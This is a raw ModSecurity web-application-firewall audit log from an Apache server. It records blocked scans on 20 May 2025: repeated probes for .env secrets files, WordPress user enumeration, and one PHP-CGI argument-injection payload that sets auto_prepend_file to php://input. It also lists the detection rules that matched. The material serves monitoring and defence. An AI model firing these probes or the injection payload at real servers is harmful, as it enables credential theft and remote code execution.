Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd6e2106-Z-- --362be06a-A-- [20/May/2025:09:08:03 +0700] aCvkA8XP1sKBAOnOfYMYAwAAAMY 103.236.140.4 36818 103.236.140.4 8181 --362be06a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.110.10.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.110.10.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --362be06a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --362be06a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747706883214359 2576 (- - -) Stopwatch2: 1747706883214359 2576; combined=1210, p1=402, p2=779, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --362be06a-Z-- --2b020554-A-- [20/May/2025:09:31:34 +0700] aCvphm2BM6ll8T8hTXt6kgAAAEo 103.236.140.4 37830 103.236.140.4 8181 --2b020554-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2b020554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b020554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747708294752774 709 (- - -) Stopwatch2: 1747708294752774 709; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b020554-Z-- --55183042-A-- [20/May/2025:09:31:42 +0700] aCvpjoKffmi-VC_l8kRJRAAAAA4 103.236.140.4 37956 103.236.140.4 8181 --55183042-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --55183042-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55183042-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747708302698622 837 (- - -) Stopwatch2: 1747708302698622 837; combined=360, p1=323, p2=0, p3=0, p4=0, p5=36, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55183042-Z-- --537be975-A-- [20/May/2025:09:32:37 +0700] aCvpxfjdRvl4szSJA_Z2XAAAAJg 103.236.140.4 38992 103.236.140.4 8181 --537be975-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.162.146.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.162.146.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --537be975-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --537be975-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747708357395326 2956 (- - -) Stopwatch2: 1747708357395326 2956; combined=1434, p1=464, p2=938, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --537be975-Z-- --1efac26e-A-- [20/May/2025:09:56:44 +0700] aCvvbPjdRvl4szSJA_Z63QAAAIY 103.236.140.4 53960 103.236.140.4 8181 --1efac26e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.174.158.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.174.158.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1efac26e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1efac26e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747709804815741 2996 (- - -) Stopwatch2: 1747709804815741 2996; combined=1315, p1=436, p2=849, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1efac26e-Z-- --ef04f621-A-- [20/May/2025:10:20:12 +0700] aCv07PjdRvl4szSJA_Z7HwAAAII 103.236.140.4 54238 103.236.140.4 8181 --ef04f621-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.92.109.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.92.109.116 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --ef04f621-C-- --ef04f621-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef04f621-E-- --ef04f621-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747711212686943 5315 (- - -) Stopwatch2: 1747711212686943 5315; combined=3468, p1=567, p2=2866, p3=0, p4=0, p5=35, sr=84, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef04f621-Z-- --1304054c-A-- [20/May/2025:10:28:24 +0700] aCv22PjdRvl4szSJA_Z7NQAAAI4 103.236.140.4 54372 103.236.140.4 8181 --1304054c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 157.230.19.140 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1304054c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1304054c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747711704073603 901 (- - -) Stopwatch2: 1747711704073603 901; combined=396, p1=361, p2=0, p3=0, p4=0, p5=35, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1304054c-Z-- --027e5b56-A-- [20/May/2025:10:34:04 +0700] aCv4LG2BM6ll8T8hTXt9vwAAAFQ 103.236.140.4 54410 103.236.140.4 8181 --027e5b56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.225.151.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.225.151.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --027e5b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --027e5b56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747712044092740 3128 (- - -) Stopwatch2: 1747712044092740 3128; combined=1331, p1=466, p2=829, p3=0, p4=0, p5=36, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --027e5b56-Z-- --3fcfb74e-A-- [20/May/2025:10:36:41 +0700] aCv4yfjdRvl4szSJA_Z7PwAAAIY 103.236.140.4 54432 103.236.140.4 8181 --3fcfb74e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 155.93.170.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.93.170.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3fcfb74e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fcfb74e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747712201897845 2378 (- - -) Stopwatch2: 1747712201897845 2378; combined=1291, p1=421, p2=839, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fcfb74e-Z-- --b9717628-A-- [20/May/2025:10:41:34 +0700] aCv57sXP1sKBAOnOfYMnMgAAANY 103.236.140.4 54514 103.236.140.4 8181 --b9717628-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.124.107.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.124.107.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b9717628-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9717628-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747712494464074 2860 (- - -) Stopwatch2: 1747712494464074 2860; combined=1303, p1=443, p2=829, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9717628-Z-- --2e149241-A-- [20/May/2025:10:43:16 +0700] aCv6VIKffmi-VC_l8kRM1gAAABg 103.236.140.4 54534 103.236.140.4 8181 --2e149241-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.157.214 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.157.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --2e149241-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e149241-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747712596886487 773 (- - -) Stopwatch2: 1747712596886487 773; combined=312, p1=272, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e149241-Z-- --d4715048-A-- [20/May/2025:12:53:57 +0700] aCwY9W2BM6ll8T8hTXuBLwAAAEk 103.236.140.4 34786 103.236.140.4 8181 --d4715048-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 161.97.153.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 161.97.153.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; MI 5X Build/OPM1.171019.019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36 Accept-Charset: utf-8 --d4715048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4715048-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747720437098265 850 (- - -) Stopwatch2: 1747720437098265 850; combined=314, p1=273, p2=0, p3=0, p4=0, p5=40, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4715048-Z-- --987fb833-A-- [20/May/2025:12:58:09 +0700] aCwZ8W2BM6ll8T8hTXuBNAAAAFM 103.236.140.4 34804 103.236.140.4 8181 --987fb833-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36 Accept-Charset: utf-8 --987fb833-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --987fb833-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747720689208831 803 (- - -) Stopwatch2: 1747720689208831 803; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --987fb833-Z-- --99df8134-A-- [20/May/2025:13:00:13 +0700] aCwabW2BM6ll8T8hTXuBOgAAAEE 103.236.140.4 34826 103.236.140.4 8181 --99df8134-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 168.253.0.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.253.0.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --99df8134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99df8134-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747720813717980 2786 (- - -) Stopwatch2: 1747720813717980 2786; combined=1240, p1=435, p2=774, p3=0, p4=0, p5=31, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99df8134-Z-- --8e03e30c-A-- [20/May/2025:13:33:41 +0700] aCwiRcXP1sKBAOnOfYMw1QAAAM8 103.236.140.4 55082 103.236.140.4 8181 --8e03e30c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 87.120.119.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 87.120.119.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8e03e30c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e03e30c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747722821983510 3358 (- - -) Stopwatch2: 1747722821983510 3358; combined=1320, p1=444, p2=837, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e03e30c-Z-- --d8f42c51-A-- [20/May/2025:14:03:13 +0700] aCwpMfjdRvl4szSJA_aJPQAAAJE 103.236.140.4 57040 103.236.140.4 8181 --d8f42c51-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 149.104.23.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 149.104.23.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d8f42c51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8f42c51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747724593053947 2722 (- - -) Stopwatch2: 1747724593053947 2722; combined=1479, p1=447, p2=1000, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8f42c51-Z-- --6a209d03-A-- [20/May/2025:14:08:38 +0700] aCwqdoKffmi-VC_l8kRUNwAAAA4 103.236.140.4 59332 103.236.140.4 8181 --6a209d03-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.88 Safari/537.36 Vivaldi/2.4.1488.36 Accept-Charset: utf-8 --6a209d03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a209d03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747724918520104 947 (- - -) Stopwatch2: 1747724918520104 947; combined=414, p1=378, p2=0, p3=0, p4=0, p5=36, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a209d03-Z-- --e199633e-A-- [20/May/2025:14:11:02 +0700] aCwrBsXP1sKBAOnOfYMx0gAAANE 103.236.140.4 59618 103.236.140.4 8181 --e199633e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36 Accept-Charset: utf-8 --e199633e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e199633e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747725062436587 1231 (- - -) Stopwatch2: 1747725062436587 1231; combined=411, p1=363, p2=0, p3=0, p4=0, p5=47, sr=78, sw=1, l=0, gc=0 Producer: 